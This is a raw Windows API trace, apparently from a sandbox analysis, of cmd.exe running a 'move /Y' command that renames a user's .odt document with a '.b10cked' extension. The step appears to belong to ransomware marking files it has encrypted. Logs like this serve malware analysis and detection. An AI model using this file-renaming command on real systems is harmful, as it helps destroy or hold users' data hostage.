GetEnvironmentStringsW () returned 0x3f0228* [0141.871] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.871] GetEnvironmentStringsW () returned 0x3f0228* [0141.872] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e99c | out: phkResult=0x22e99c*=0x40) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0xb8, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x0, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, 
lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegCloseKey (hKey=0x40) returned 0x0 [0141.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e99c | out: phkResult=0x22e99c*=0x40) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x40, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, lpData=0x22e9a8*=0x1, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x0, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x4, lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x4) returned 0x0 [0141.872] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9a4, lpData=0x22e9a8, lpcbData=0x22e9a0*=0x1000 | out: lpType=0x22e9a4*=0x0, 
lpData=0x22e9a8*=0x9, lpcbData=0x22e9a0*=0x1000) returned 0x2 [0141.873] RegCloseKey (hKey=0x40) returned 0x0 [0141.873] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.873] srand (_Seed=0x5b886370) [0141.873] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" [0141.873] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" [0141.873] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.873] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1988, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.873] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.873] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.874] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.874] _wcsicmp (_String1="PROMPT", 
_String2="TIME") returned -4 [0141.874] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.874] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.874] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.874] GetEnvironmentStringsW () returned 0x3f2378* [0141.874] FreeEnvironmentStringsW (penv=0x3f2378) returned 1 [0141.874] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.874] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.874] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.874] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.874] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.874] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.874] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.874] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.875] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f768, lpFilePart=0x22f764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f764*="Desktop") returned 0x18 [0141.875] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.875] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.875] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.875] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f4e4 | out: lpFindFileData=0x22f4e4) returned 0x3f0a08 [0141.875] FindClose (in: hFindFile=0x3f0a08 | out: hFindFile=0x3f0a08) returned 1 [0141.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.876] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.876] GetEnvironmentStringsW () returned 0x3f0228* [0141.876] FreeEnvironmentStringsW (penv=0x3f0228) returned 1 [0141.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.877] GetConsoleOutputCP () returned 0x1b5 [0141.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.877] GetUserDefaultLCID () returned 0x409 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="0") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="0") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f8a8, cchData=128 | out: lpLCData="1") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.878] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.878] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.879] GetConsoleTitleW (in: lpConsoleTitle=0x3e0940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.879] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.880] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.880] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.880] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.880] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.880] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.880] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.880] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0141.885] GetConsoleTitleW (in: lpConsoleTitle=0x22f5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.314] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.314] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.314] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.314] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.314] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.314] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.314] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.314] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.314] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.314] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.314] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.314] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.314] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.314] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.314] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.315] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.315] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0142.315] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0142.315] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.315] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.315] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.315] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.315] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.315] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.316] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f35c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f354, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f354*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.316] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.317] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.317] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.317] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0142.318] _wcsicmp (_String1="VAFVM9~1.ODT", _String2=".") returned 72 [0142.318] _wcsicmp (_String1="VAFVM9~1.ODT", _String2="..") returned 72 [0142.318] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9~1.odt")) returned 0x20 [0142.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f1f78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.612] SetErrorMode (uMode=0x0) returned 0x0 [0142.612] SetErrorMode (uMode=0x1) returned 0x0 [0142.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", nBufferLength=0x104, lpBuffer=0x22ece4, lpFilePart=0x22eccc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", lpFilePart=0x22eccc*="VAFVM9~1.ODT") returned 0x3f [0142.612] SetErrorMode (uMode=0x0) returned 0x1 [0142.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0142.613] _wcsicmp (_String1="VAFVM9~1.ODT", _String2=".") returned 72 [0142.613] _wcsicmp (_String1="VAFVM9~1.ODT", _String2="..") returned 72 [0142.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9~1.odt")) returned 0x20 [0142.613] SetErrorMode (uMode=0x0) returned 0x0 [0142.613] SetErrorMode (uMode=0x1) returned 0x0 [0142.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", nBufferLength=0x104, lpBuffer=0x22f160, lpFilePart=0x22eef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", lpFilePart=0x22eef8*="VAFVM9~1.ODT") returned 0x3f [0142.613] SetErrorMode (uMode=0x0) 
returned 0x1 [0142.613] SetErrorMode (uMode=0x0) returned 0x0 [0142.613] SetErrorMode (uMode=0x1) returned 0x0 [0142.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", nBufferLength=0x104, lpBuffer=0x22f368, lpFilePart=0x22eef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", lpFilePart=0x22eef8*="vaFvM9aFd9qECGT.odt.b10cked") returned 0x4e [0142.613] SetErrorMode (uMode=0x0) returned 0x1 [0142.613] SetLastError (dwErrCode=0x0) [0142.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt.b10cked")) returned 0xffffffff [0142.613] GetLastError () returned 0x2 [0142.613] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x22e874, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e874) returned 0x3f2188 [0142.614] FindNextFileW (in: hFindFile=0x3f2188, lpFindFileData=0x22e874 | out: lpFindFileData=0x22e874) returned 0 [0142.614] GetLastError () returned 0x12 [0142.614] FindClose (in: hFindFile=0x3f2188 | out: hFindFile=0x3f2188) returned 1 [0142.616] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x3f1d18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3f1d18) returned 0x3f2188 [0142.616] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", nBufferLength=0x104, lpBuffer=0x22eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", lpFilePart=0x0) returned 0x4e [0142.616] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt", nBufferLength=0x104, lpBuffer=0x22eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt", lpFilePart=0x0) returned 0x46 [0142.616] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt")) returned 0x20 [0142.616] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt.b10cked"), dwFlags=0x3) returned 1 [0142.617] FindClose (in: hFindFile=0x3f2188 | out: hFindFile=0x3f2188) returned 1 [0142.617] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eac0 | out: _Buffer=" 1") returned 9 [0142.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.617] GetFileType (hFile=0x7) returned 0x2 [0142.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.617] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ea4c | out: lpMode=0x22ea4c) returned 1 [0142.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ea80 | out: lpConsoleScreenBufferInfo=0x22ea80) returned 1 [0142.617] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.618] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eac0 | 
